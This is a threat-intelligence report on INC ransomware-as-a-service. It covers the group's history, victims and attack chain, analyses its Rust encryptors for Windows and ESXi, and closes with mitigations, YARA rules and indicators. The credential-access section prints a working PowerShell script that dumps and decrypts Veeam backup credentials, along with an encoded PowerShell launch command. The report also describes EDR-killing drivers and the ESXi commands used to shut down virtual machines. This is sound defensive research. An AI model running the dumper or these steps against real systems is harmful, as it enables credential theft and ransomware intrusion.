From emerging threat to top-tier ransomware-as-a-service: The evolution of INC ransomware | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #ransomware

Author: Darrel Virtusio

Summary

• INC has evolved from an emerging ransomware-as-a-service (RaaS) operation into one of the most active ransomware groups in 2026, claiming more than 800 victims since 2023.

• The disruption of LockBit and the shutdown of BlackCat created opportunities for INC to expand as affiliates migrated to alternative ransomware operations.

• Both the Windows and Linux/ESXi encryptors have been rewritten in Rust, enabling cross-platform development and increasing analysis complexity.

• Recent incidents reveal updated tooling, including a modified credential dumper capable of targeting newer Veeam backup deployments. The updated tool includes support for Veeam’s newer salted DPAPI credential encryption method which suggests INC operators’ continuous refinement of their tooling.

• INC’s influence extends beyond its own operations. Following the 2024 sale of its source code, related ransomware families such as Lynx and Sinobi emerged with significant code overlap.

• United States organizations account for more than 65% of listed victims, with legal services, manufacturing, construction, technology and health care among the most targeted
  sectors.

• This report examines INC’s evolution, attack chain, tooling, victimology and the latest tactics, techniques and procedures (TTPs) observed in recent intrusions. 

Introduction

Modern ransomware attacks disrupt business
operations, expose sensitive data, and cause substantial financial, operational
and reputational damage. Despite continued investments in security controls,
ransomware groups continue to evolve their tactics through
ransomware-as-a-service (RaaS) models that lower the barrier to entry for
affiliates and enable attacks at scale.

Among today’s most active RaaS operations,
INC ransomware has rapidly established itself as a major threat. Since emerging
in 2023, the group has expanded its capabilities through the development of
Windows and Linux/ESXi ransomware variants, ongoing tooling improvements and a
growing affiliate ecosystem. INC has also been linked to multiple high-profile
incidents and has influenced the broader ransomware landscape through the sale
of its source code, which contributed to the emergence of related ransomware
families such as Lynx and Sinobi. In 2026 alone, the group has continued to add
hundreds of victims to its data leak site, placing it among the most active
ransomware operations globally.

In this report, the Acronis Threat Research
Unit (TRU) examines the evolution of INC ransomware, its attack chain,
victimology, tooling and recent tactics, techniques and procedures (TTPs). We
also analyze the group’s Windows and Linux/ESXi payloads, highlight notable
developments observed in recent incidents and provide detection, mitigation and
risk-reduction recommendations to help organizations defend against this
growing ransomware threat.

Background
and history

Discovered
in mid-2023, INC ransomware is another RaaS group that employs double extortion
tactics, like most of the modern ransomware groups. It established itself as a
semi-private, affiliate-based RaaS operation rather than a direct rebrand of an
existing cybercriminal syndicate. Since its inception, it quickly gained reputation and notoriety by
aggressively targeting high-profile organizations across multiple sectors,
particularly the heavy target of education and health care sectors in its early
stages.

Operationally, INC ransomware evolved quickly
through 2023–2025. A Linux/ESXi variant appeared in-the-wild (ITW) within
months, targeting VMware infrastructure and mirroring a broader shift among
ransomware operations toward maximizing impact by encrypting hypervisors and
the virtual machines they host. And almost simultaneously improving its Windows
variant. In its most recent iteration, both payloads are rewritten in Rust. This
makes analysis and detection harder while making cross-platform development and
implementation easier.

Beyond improving its encryptor, INC
ransomware expanded its affiliations. In late 2024, Vice Society was observed deploying INC ransomware against the health care industry; this group has a long-standing habit
of cycling through third-party payloads such as BlackCat, Rhysida, Hello Kitty,
Zeppelin, and Quantum Locker. Additionally, following the disruption of LockBit
and the shutdown of BlackCat, several of their affiliates have reportedly migrated to INC.

INC’s source code also went up for sale. In
May 2024, a forum user called “salfetka” listed the Windows and
Linux/ESXi payloads on underground forums for $300,000, limited to three
buyers. Notably, security researcher 3xp0rt mentioned that “salfetka” is linked to the aliases “rinc” and
“farnetwork” which is tied to the Nokoyawa, JSWORM, Nefilim, Karma
and Nemty ransomware operations. Shortly after the listing, the Lynx ransomware operation emerged, showing substantial code overlap with INC. Sometime
later, the Sinobi ransomware operation also appeared. INC’s evolution therefore
branches at this point: the original brand continues to operate while elements
of its codebase propagate into adjacent operations. 

Victimology

INC
ransomware has had more than 800 victims since 2023. Its victims span globally
but it predominantly targets organizations from the United States and has many
notable victims from the past including NHS Scotland, Xerox and Texas State Bar,
among others.

Currently,
INC ransomware is involved in the top five breaches this year. In 2026, INC has
been consistently posting victims and has firmly established itself as one of
the top five most active ransomware groups globally this year.

As
seen in the graph above, United States accounts for 65.3% (as of this writing) of
all the victims and with a long tail led by Australia, Canada, Germany and Taiwan.
On the other hand, the complete absence of Commonwealth of Independent States
(CIS) victims suggests that operators are based in the CIS region, and are part
of their affiliate program to avoid attacking organizations within the CIS
region.

INC ransomware’s sector targeting is broad-based.
The top five targets for 2026 are legal services, manufacturing, technology, health
care and construction. Previously, the education sector was the main target of
INC ransomware. However, several things make law firms a valuable target for
ransomware groups. The files they hold include settlement documents, cases,
NDAs and many more similar documents. When leaked, it could trigger malpractice
claims and lawsuits from clients on top of reputational damage, which adds even
more pressure to pay the ransom.

Targeting also shifts by region. U.S. victims
cluster in regulated, privacy-sensitive industries (legal and health care) that
often carry insurance. Outside the U.S., victims are more widespread in sectors
like technology, manufacturing, construction and others. This suggests that the
focus is on high-pressure U.S. industries that are more likely to pay, and a
broader, less selective one everywhere else.

Campaign
overview

INC ransomware attack chain

INC
ransomware affiliates utilize a diverse range of tools and techniques in
targeting victims. In their latest campaigns, they continue to target unpatched
edge devices for initial access, dump credentials from Veeam backup servers and
use a mix of LOLBins and commercial RMM tools to move through victim networks. The sections below walk through
the tactics we’ve observed across recent incidents, mapped to the stages of the
attack chain. 

Initial access

INC
ransomware is known to gain access to their target victims through spear phishing,
valid account credentials from Initial Access Brokers (IAB) and exploitation of
vulnerabilities in public-facing applications such as CVE-2023-3519 (Citrix
Netscaler), CVE-2023-48788 (Fortinet EMS), CVE-2024-57727 (SimpleHelp RMM) and
CVE-2025-5777 (Citrix Bleed 2). 

Discovery

After gaining access, it’s been observed
through multiple incidents that INC ransomware actors have performed discovery
techniques through ping and net commands through cmd.exe. Other than built-in commands, there were also
cases where they have used tools like Angry IP scanner, Advanced IP scanner and
netscan.

C:\Program Files\Angry IP Scanner\ipscan.exe
\\10.2.2.202\c$\Software\Advanced_IP_Scanner_2.5.3850.exe
C:\ProgramData\VMware\libsm2\netscan.exe

Credential access

We have
observed that recent INC ransomware incidents to extract sensitive credentials deploy a base64 encoded script through cmd.exe.

cmd.exe
/Q /c powershell.exe -e
JABTAHEAbABEAGEAdABhAGIAYQBzAGUATgBhAG0AZQAgAD0AIAAiAFYAZQBlAGEAbQBCAGEAYwBrAHUAcAAiAAoAJABTAHEAbABTAGUAcgB2AGUAcgBOAGEAbQBlACAAPQAgACIAVgBCAC0ASABWADIAIgAKACQAUwBxAGwASQBuAHMAdA…

The
decoded script is found to be a Veeam credential dumper. It is a modified
version of the open-source Veeam-Get-Creds.ps1 script
found in GitHub.

$SqlDatabaseName
= “REDACTED”
$SqlServerName
= “REDACTED”
$SqlInstanceName
= “REDACTED”
$b64Salt
= “”

#Forming the connection string

$SQL = “SELECT [user_name] AS ‘User’, [password] AS
‘Password’, From emerging threat to top-tier ransomware-as-a-service: The evolution of INC ransomware  Acronis AS ‘Description’ FROM
[$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ”” #Filter empty passwords

$auth = “Integrated Security=SSPI;” #Local user

$connectionString = “Provider=sqloledb; Data
Source=$SqlServerName\$SqlInstanceName; Initial Catalog=$SqlDatabaseName;
$auth;”

$connection = New-Object
System.Data.OleDb.OleDbConnection $connectionString

$command = New-Object
System.Data.OleDb.OleDbCommand $SQL, $connection

#Fetching encrypted credentials from the database

try {

   
$connection.Open()

   
$adapter = New-Object System.Data.OleDb.OleDbDataAdapter $command

   
$dataset = New-Object System.Data.DataSet

    [void] $adapter.Fill($dataSet)

   
$connection.Close()

}

catch {

   
Write-Host “Can’t
connect to DB! Exiting…”

    exit -1

} 

$output=($dataset.Tables | Select-Object
-Expand Rows)

if ($output.count -eq 0) {

   
Write-Host “No
passwords found!”

    exit

}

Add-Type -assembly System.Security

# Decrypting passwords using DPAPI

$output | ForEach-Object -Process {

   
$EncryptedPWD = [Convert]::FromBase64String($_.password)

   
$enc = [system.text.encoding]::Default

    try {

       
# Decrypt password with
DPAPI (old Veeam versions)

       
$raw = [System.Security.Cryptography.ProtectedData]::Unprotect(
$EncryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine
)

       
$pw_string = $enc.GetString($raw) -replace ‘\s’, ‘WHITESPACE_ERROR’

    } catch {

       
try{

           
# Decrypt password with
salted DPAPI (new Veeam versions)

           
$salt = [System.Convert]::FromBase64String($b64Salt)

           
$hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList
($EncryptedPWD.Length * 2)

           
foreach ($byte in $EncryptedPWD)

           
{

                $hex.AppendFormat(“{0:x2}”, $byte) > $null

           
}

           
$hex = $hex.ToString().Substring(74,$hex.Length-74)

           
$EncryptedPWD = New-Object -TypeName byte[] -ArgumentList ($hex.Length /
2)

           
for ($i = 0; $i -lt $hex.Length; $i += 2)

           
{

                $EncryptedPWD[$i / 2] = [System.Convert]::ToByte($hex.Substring($i, 2), 16)

           
}

           
$raw = [System.Security.Cryptography.ProtectedData]::Unprotect($EncryptedPWD,
$salt, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)

           
$pw_string = $enc.GetString($raw) -replace ‘\s’, ‘WHITESPACE_ERROR’

       
}catch {

           
$pw_string = “COULD_NOT_DECRYPT”

       
}

    }

   
$_.user = $_.user -replace ‘\s’, ‘WHITESPACE_ERROR’

   
$_.password = $pw_string

   
$_.description = $_.description -replace ‘\s’, ‘WHITESPACE_ERROR’

} 

Write-Output $output | Format-Table
-HideTableHeaders | Out-String -Width 10000

The modified version operates by adding
support for the newer Veeam credential encryption method that uses salted
DPAPI. Unlike the original version, which automatically pulls database
connection settings from the registry, the updated script uses hardcoded SQL
server, instance and database values, which suggests it was adapted for a
specific target environment. It also introduces a fallback decryption routine
for newer encrypted credential blobs, improves error handling and description
metadata, and formats output more cleanly for automation or parsing.
Ultimately, the updated script is more reliable, more compatible with modern
Veeam deployments and designed for operational use.

Lateral movement

To move
laterally within the victim’s environment, INC ransomware actors use
living-off-the-land binaries (LOLBins), including remote desktop protocol (RDP)
and PsExec, to access and execute commands on other systems in the network.

Defense impairment

In recent incidents, INC ransomware actors
have used different tools to kill EDRs. In one case, they used a Sysinternals
utility named PsKill that terminates local or remote processes by PID or
process name.

\\?\B:\[REDACTED]\Scripts\PSTools\pskill.exe

In another case, the actors deployed a custom
process terminator that drops vulnerable drivers (filwfp.sys, filnk.sys,
fildds.sys) and installs them as a service. The tool accepts a -p parameter
followed by the PID or process name to terminate, similar to PsKill.

Sample execution:

ProcessTerminator.exe -p

Command and control

We have observed a mix of red team and
commercially available remote access tools. Across different incidents, Cobalt
Strike, AnyDesk, ScreenConnect, and TeamViewer were used by INC ransomware
actors. These tools are known to be used by many ransomware groups as they
blend into legitimate IT activity in logs and provide reliable command-and-control
(C2) server.

Exfiltration

INC
ransomware actors compress and password-protect the staged data with 7-Zip,
then upload the archives to attacker-controlled cloud storage using rclone.
Many ransomware groups use rclone because the same binary works with dozens of
cloud providers, so operators can pick whichever destination the victim’s
firewall is least likely to block.

Impact

After staging and exfiltrating the data, INC ransomware
actors run the encryptor across the environment. The ransomware payload
behavior is highly configurable and is dictated by command-line arguments
entered by the operator at execution.

• Multithreaded efficiency: To maximize data destruction speed, the malware utilizes multithreading, automatically spawning a total thread count equal to the host’s number of processors, multiplied by four.

• Partial encryption modality: The payload employs a tiered partial encryption routine based on file size to accelerate the process.

• Exclusion lists: The algorithm deliberately avoids critical system files and directories to ensure the host remains functional enough to display the extortion message, skipping extensions like .msi, .exe, .dll, and .inc, as well as folders such as Windows, Program Files, appdata, and $RECYCLE.BIN. 

Infrastructure and extortion tactics

INC
Ransomware manages a distinct infrastructure designed to maximize pressure
through double extortion: 

• Dual-site strategy: The group operates two separate web platforms. The first is a private negotiation site requiring unique credentials provided to the victim to act as a secure communication channel. The second is
  a publicly accessible leak site used to publish exfiltrated corporate data if compliance is refused.

• Network printing routines: Upon successful encryption, the malware modifies the host’s desktop wallpaper to
  display the extortion demands and drops both .txt and .html versions of the INC-README note. Additionally, the payload scans the compromised network for active printers and automatically transmits commands to physically print hard copies of the ransom instructions. 

Technical
analysis

Windows

The ransomware sample is a 64-bit
Windows Portable Executable (PE64) compiled within a Microsoft Visual C/C++
environment. Crucially, the binary is heavily packed and protected by VMProtect
(version 3.X), introducing advanced structural obfuscation designed to severely
hinder reverse engineering. This protection layer virtualizes the core
instructions into a randomized, proprietary bytecode format while concealing
the import address table (IAT) to mask system API interactions. Consequently,
traditional static analysis is heavily obstructed, requiring dynamic debugging
or specialized unpacking procedures to uncover the payload’s underlying
encryption routines and configurations.

While initial automated heuristics
flag the payload as packed due to elevated file-wide data density, detailed
sectional entropy analysis confirms that all individual segments retain a
native, unpacked status. This structural layout — combined with a fully exposed
IAT — verifies that the threat actors did not employ binary encapsulation or
code virtualization to shield the malware. Instead, the raw executable
instructions are entirely uncovered, allowing for immediate static mapping of
the binary’s core subroutines and system API loops.

Execution

Initial disassembly of the INC
ransomware payload reveals a highly structured, native-execution profile
comprising 4,248 distinct functions. Unlike heavily armored or packed variants
that completely conceal their structural dependencies, this sample maintains a
fully intact and exposed IAT featuring standard Windows administrative
subroutines from KERNEL32.dll and ADVAPI32.dll, as well as cryptographic
primitives such as BCryptGenRandom. This un-obfuscated layout indicates that
the ransomware relies directly on native operating system subsystems to manage
its execution environment right out of the gate.

Immediately following environment
initialization, the malware invokes GetCommandLineW to retrieve the complete
execution string passed by the operator. By querying this API early in its life
cycle, the binary prepares to evaluate runtime constraints and parameters,
ensuring that any operator-specified configurations are integrated into the
execution flow prior to the deployment of any defensive evasion or encryption
subroutines.

The payload initiates its persistence
routine by invoking OpenSCManagerW with an explicit 0xF003F
(SC_MANAGER_ALL_ACCESS) access mask. This specific configuration confirms that
the current execution branch demands full, unrestricted administrative privileges
(such as a local administrator or SYSTEM security context) to gain complete
control over the Service Control Manager database prior to executing subsequent
service installation or configuration modifications.

The analysis of the payload’s
process-handling subroutines reveals a fully orchestrated, synchronous
termination sequence designed to forcefully eliminate resource-locking
applications. The malware passes target process IDs (PIDs) directly to
OpenProcess using a high-privilege access mask (dwDesiredAccess) to obtain a
valid task handle.

Upon verifying the handle’s validity via internal register
checks (rax), the binary directly executes TerminateProcess to kill the targeted
application workspace instantly. Notably, successful termination branches into
a dedicated execution-logging block that references a hardcoded string literal
at off_5C6DC0 (“Successfully killed process: \n”). The inclusion of
this verbose text instrumentation confirms the presence of an active debugging
or feedback architecture that tracks deployment metrics in real time.

To maximize the scope of its
deployment, the payload initiates a systematic discovery loop targeting all
connected storage infrastructure. As demonstrated via static analysis, the
malware dynamically constructs standard root path strings inside a local buffer,
iterating sequentially through the alphabet. It passes each generated path to
GetDriveTypeW for evaluation of the underlying storage medium. By filtering the
numeric type codes returned by the operating system, the binary identifies
active volumes, distinguishing between local fixed disks, removable media and
mapped network shares.

To interface with low-level system
drivers, the payload contains specialized routines designed to issue direct
requests to the Windows kernel. Static analysis isolates an execution block
utilizing the DeviceIoControl API. Immediately preceding the call, the malware
initializes the edx register (which dictates the dwIoControlCode parameter)
with the explicit control code 0x53C028 (rendered contextually by the
disassembler as an offset expression relative to loc_53C026). By dispensing
this specific IOCTL command to an active device handle, the ransomware
communicates directly with underlying storage drivers or file-system filters,
potentially attempting to bypass volume restrictions or disable endpoint
security controls before deploying its encryption threads.

Upon successful driver
reconfiguration, the control flow falls through to a diagnostic block
referencing the cleartext string literal “Successfully deleted shadow
copies from ” (off_5C6468), confirming a quiet execution before releasing
its temporary tracking structures back to the operating system using HeapFree.

This command-line interface
demonstrates that the binary is an internally driven, operator-configurable
tool designed for hands-on, human-operated network deployments.

Rather
than executing blindly, the malware gives the attacker precise tactical
controls: allowing them to dynamically filter target software (like backup
engines, Veeam or SQL databases), execute silent anti-forensic passes (quiet)
or simulate deployment without breaking things (def).

The binary
contains an embedded, hardcoded array of specific folders within its data
segment that are explicitly ignored during execution. The array strictly
contains the strings windows, program files, appdata, $recycle.bin, programdata
and all users. During execution, the malware references these specific tokens
to identify and bypass core system folders and application configurations,
ensuring the operating system deployment environments remain stable while
traversing the file system.

Encryption

The contiguous string literals
extracted from the .rdata segment (EncryptionAlgo, SALSA20, AES and
EncryptionHeader) confirm that the payload employs a high-performance hybrid
symmetric / asymmetric encryption scheme. Rather than relying on a single
cryptographic primitive, the binary utilizes a multitiered architecture.

The discovery of curve25519-dalek
artifacts confirms that the ransomware implements modern Curve25519 Elliptic
Curve Cryptography (ECC) as its asymmetric layer to protect the symmetric keys
stored in the file footers. Additionally, the embedded /work/cargo/registry/…
dependency paths serve as a definitive compiler signature proving that the
payload was developed using the Rust programming language within a
containerized build pipeline.

Static analysis of the initialization
phase confirms that the ransomware implements dynamic thread-pool sizing based
on host hardware constraints. By invoking the native GetSystemInfo Windows API,
the binary retrieves the active dwNumberOfProcessors core count metric. The
compiler optimizes the thread allocation equation using an arithmetic
left-shift instruction (shl ebp, 2), effectively multiplying the detected core
count by four to establish the total concurrent worker thread capacity assigned
to downstream encryption tasks.

Assembly code inspection reveals that
the malware calls the native Windows CNG API, BCryptGenRandom, to obtain unique
16-byte initialization vectors (IVs) or cryptographic keys for file encryption.

The code explicitly sets up this call
by clearing the algorithm handle (ecx = 0) and setting the flags register (r9d
= 2), which invokes the BCRYPT_USE_SYSTEM_PREFERRED_RNG configuration. This
instructs the operating system to use its default, system-preferred random
number generator. By enforcing a strict length constraint of 16 bytes (r8d =
10h), the routine fills a local stack buffer with a 128-bit secure random
value, verifies a successful execution status (test eax, eax) and passes the
generated bytes directly to the downstream encryption engine.

Dynamic execution of the malware
payload using the targeted “–file” configuration argument successfully
confirmed the payload’s dual-marking mechanism during the testing process. The
external addition of the .INC extension to the modified filename on disk was
noticed, and a hardcoded INC signature was observed at the absolute end of the
encrypted file stream to be utilized as a structural footer for the decryptor.

Linux/ESXi

The
ransomware sample is a 64-bit Linux Executable and Linkable Format (ELF64)
binary compiled as a position-independent shared object (DYN) under GCC (3.X).
Crucially, the binary does not exhibit signs of commercial packing or
virtualization layers, leaving standard structural profiling, string extraction
and code disassembly directly accessible. Although several PE analysis tools
identify this sample as being written in C or C++, the binary was actually
developed in Rust. This is supported by the presence of Rust-specific function
symbols, naming conventions, and embedded runtime strings within the
executable.

Command line

At the start of the execution, the
sample gets command line arguments and compares them with the saved ones. They
can be obtained with ‘-h’ or ‘–help’ arguments. 

Ransom note extraction

After that,
it loads a string from a large, hard-coded data blob. Some of these strings
look like some execution logs and indicate files and folders encryption, ransom
note and error handling. At the end of this block, there is also a large Base64
string.

This Base64
encoded string is actually a ransom note. Decoded variants are saved in memory
for later usage.

ESXi
targeting

When a sample is executed with
‘–esxi’ argument, it will enter a function that is responsible for shutting
down virtual machines.
At the start of this function, it loads a string blob into memory, extracts the
first 7 characters, and passes them to the “Command::new” function. The string
extracted from the blob is ‘vim-cmd’, which is a VMware Infrastructure
Management command tool. Next, it loads one more blob with strings, but this
time it gets the first 15 symbols, which returns “/vmsvc/getallvms/” value. Now
it executes the command, where ‘vmi-cmd’ is a process that will be spawned, and
‘getallvms’ is an argument.

This command will return a list of all
virtual machines. Next, it will load additional commands in the same way. This
command is ‘/vmsvc/power.off. Sample will pass the obtained list to this
command in order to shut down all running machines. This is performed to ensure
that these virtual machines will not block access to ESXI files that must be
encrypted.

Additionally, the –skip
argument can be used to exclude specific virtual machines from processing.
However, since the –esxi mode operates on all available VMs and the –skip
parameter must be supplied when the sample is launched, the attacker must
already know the target VM IDs before execution. 

Message of the day

If the
‘–motd’ argument was provided, the attacker will write a previously decoded
ransom note to the ‘/etc/motd’ file. The contents of this file are displayed by
login after a successful login, but just before it executes the login shell,
for example, when an SSH session is established.

Encryption

The encryption process starts from
creating threads. The main thread will be responsible for file search, and the
other threads will be responsible for file encryption. All encryption threads
have ‘sub_55555541AD40’ starting address, and their number is dependent on the
number of logical processors in the system.

At the start of each encryption
thread, the sample generates 32 random bytes using the operating system’s
random number generator. These bytes are then passed to the clamp_scalar
function to transform them into a valid Curve25519/X25519 private scalar. The
clamped value is later used as an ephemeral private key for the X25519
algorithm. Based on this private key, the sample generates a corresponding
ephemeral public key. After generating the key pair, the sample loads a
hardcoded X25519 public key embedded in the binary. This key is stored in
Base64 format and most likely belongs to the attackers.

Using the
generated ephemeral private key and the embedded attacker’s public key, the
sample performs an Elliptic-Curve Diffie-Hellman (ECDH) operation to derive a
shared secret. The resulting shared secret is then converted into a raw byte
representation and hashed using the SHA-256 algorithm. The produced SHA-256
digest is used as a symmetric key material for AES-128 encryption.

The
sample initializes the AES-128 key schedule and prepares AES-CTR mode counters
and nonce values. During file encryption, the malware constructs sequential
counter blocks, encrypts them using AES-128 and uses the generated keystream to
XOR plaintext file data. This process is repeated block by block until the
entire target file is encrypted.

Similar to the Windows variant, the
Linux sample appends ‘.INC’ extension to all encrypted files, as well as a
footer at the end of the file. The footer consistently begins with five 00
bytes followed by the constant value ‘50 0F’, which remains identical across
all analyzed samples. After an additional ‘00’ byte, the next value appears to
indicate the encryption mode used for the file. Observed values include:

●     0C = fast mode

●     04 = medium mode

●     01 = slow mode

The footer terminates with the ASCII
string INC, which serves as a file marker or magic value identifying the
ransomware family.

Ransom Note

Analysis
of the string tables and corresponding reference code confirms that the
ransomware stores its primary ransom note payload within the binary as a
hardcoded, Base64-encoded string snippet (~~~~ INC Ransom ~~~~…).

In addition
to data modification, the malware includes built-in capabilities to adjust the host
user interface. It overwrites the target host’s wallpaper with a visual
notification of the ransom demands, displayed directly on the user’s screen. 

Conclusion
and impact

INC continues to strengthen its ransomware
operation through Rust-based payload rewrites and continuous toolkit
enhancement, while carefully targeting industries such as health care, legal
services, professional services, manufacturing and construction where
operational downtime creates strong financial pressure to pay. This threat is
further amplified because these sectors depend heavily on uninterrupted
operations and supply chains, increasing the risk of collateral exposure across
vendor networks and downstream partners when breaches occur.

The group’s influence has also expanded
beyond its own brand following the 2024 sale of its source code, with related
strains appearing in operations such as Lynx and Sinobi. At the same time, the
disruption of LockBit and BlackCat allowed affiliates and tools to shift toward
groups like INC, helping them grow their presence within the ransomware
ecosystem. Because these affiliates continue to rely on opportunistic tactics
such as stolen credentials, phishing, credential reuse and exploitation of
unpatched remote services, organizations should prioritize reducing external
exposure and securing perimeter access points to limit the risk of intrusion. 

Detection
by Acronis

This threat has been detected and blocked by Acronis EDR /
XDR:

Mitigation
and recommendations

INC ransomware
typically gains initial access through exploiting vulnerable infrastructure or using
stolen or compromised credentials. Below are some guidelines to help
organizations prevent and mitigate the threat posed by INC ransomware.

• Backups and recovery. Follow the 3-2-1 backup rule by keeping at least three copies of data on two different media types, with one copy stored off-site, and ensure backups are offline or immutable and regularly tested for reliable restoration.

• Endpoint and ransomware protection. Deploy EDR and ransomware protection capable of detecting unauthorized encryption and exfiltration attempts and ensure all security tools are kept up to date with behavioral detections and anti-tamper protections enabled.

• Identity and access controls. Require multifactor authentication (MFA) and enforce the use of strong, complex alphanumeric passwords that are updated regularly.

• Network segmentation and hardening. Reduce attack surface by segmenting networks, disabling unnecessary
  services and ports and restricting outbound traffic.

·      
Patch and vulnerability management. Implement a robust patch and vulnerability management program
across all systems, prioritizing fixes for vulnerabilities known to be
exploited by ransomware.

·      
User Awareness Training. Regularly educate staff on phishing, social engineering and other
tactics used by ransomware operators. Include conducting regular phishing
simulations to reinforce awareness. 

YARA
rules

rule
MAL_RANSOM_INC_WINDOWS

{

meta:

description
= “Matches INC Ransomware Rust-compiled samples for Windows”

author
= “Acronis Threat Research Unit (TRU)” 

strings:

        $a1 = “[INC-README.txt..”
ascii wide

        $a2 = “Successfully added file to
queue:” ascii wide

        $a3 = “while deleting shadow
copies from” ascii wide

        $a4 = “Successfully deleted shadow
copies from” ascii wide

        $a5 = “while killing processes by
mask” ascii wide

        $a6 = “while killing services by
mask” ascii wide

        $a7 = “Successfully killed
processes by mask” ascii wide

        $a8 = “while encrypting
file:” ascii wide

        $a9 =
“INCdirectory(ies)dirEncryption directory(ies)” ascii wide 

condition:

(uint16(0)
== 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)

and
all of ($a*)

}

rule
MAL_RANSOM_INC_LINUX

{

meta:

description
= “Matches INC Ransomware Rust-compiled samples for Linux/ESXi”

author
= “Acronis Threat Research Unit (TRU)” 

strings:

        $a1 = “[INC-README.txtINC”
ascii wide

        $a2 = “while running as a
daemon” ascii wide

        $a3 = “while stopping ESXi
machines” ascii wide

        $a4 = “while removing ESXi
snapshots” ascii wide

        $a5 = “while setting motd”
ascii wide

        $a6 =
“fn5+fiBJTkMgUmFuc29tIH5+fn4” ascii wide 

condition:

(uint32(0)
== 0x464C457F) and all of ($a*)

} 

Indicators
of compromise (IOCs)

Windows

31800380c359143ae82c4f9011eee653dd22443d03d6a499148203bbfc275502

ea721240c14e3d14f8d88e0020880448c6c602f1180a1e5dbe40871cfeedcc22

8d1a22c430252f29611766b8e4a82af0fba60d609246463466b384d6d4793df4

bf8c45e5aa9551a17eefbd1d179422c32b4309c47ee9a3f315bb80ed6d4f7efc

6bf155b269d452f3c3b62832b27bbebe4da436e228dbf521155b1d5989e3743f

1898d056463284d849801cbdea6a3dec6c9f568f01569912c3868a5eea9a5449

24f6c0ca39b2a5593086ff56d818ddfbde121f8e44d54faa762e510397dc9db7

dc9938f51150d13a69fc25f3f19052eacb1bf0a086fd5cf39762501fb3ddd7da

acce811c4fc2a6e3fddd4231e386f1648ca44f039d2d275316bc0a0fc96e0af4

90e46e89fec2108a1cb4850bb33e3563e92a14d04e1e613ac8c9311f152d294c

ff5da8f0330a4c581c37284c74aae2683c007dc6e406e1e2e6803e7bb398b77b

97aebda5482899fef84a24e456bff055acaa47e5ab4029f768d9e0c62a660ce2

1d10d8f5a420d0e4683b4cb40bcf0c984d1e7ea1f3b4442a00a525584632ac11

f6a01d0246ce31faf6938ea488086d4358505405a4ef5c5faa482e79e92cb347

d65120291dee76c694f8bea54841f7f68329b499b28f4aee5ea5c9369a7432cb

765508aa2ec6a1b73a76a23f4fa559d32355622748c91a46ed7b315eae2ee60a

d26bfb0147f60dc6500a9298d521ee67b49daaf4b8f8be54e7cc8fd86a597570

Linux

589d9480fbfec2d8e61638eb0b537183d0f9977411fd1d2c0f8eb611feebe880

7f37351979c249417cb180b4ede0ed17e5fe2a1f08add4d72606b589f8fdb245

5cc212f84d2bf3fbab165aaf09b16e00fcf2f1ccd880d24b14404c53dcdbf241

60aeb9f7bccf377ff02ed64783e66a62c0f976878d9729b067bc7e5b0b9da9d6

6cd349eda0fa6c8b274a0920852c68f8b727afea1fdbc69ad183cef05d9cf141

Network

incblog[.]su

incblog6qu4y4mm4zvw5nrmue6qbwtgjsxpw6b7ixzssu36tsajldoad[.]onion

incpaykabjqc2mtdxq6c23nqh4x6m5dkps5fr6vgdkgzp5njssx6qkid[.]onion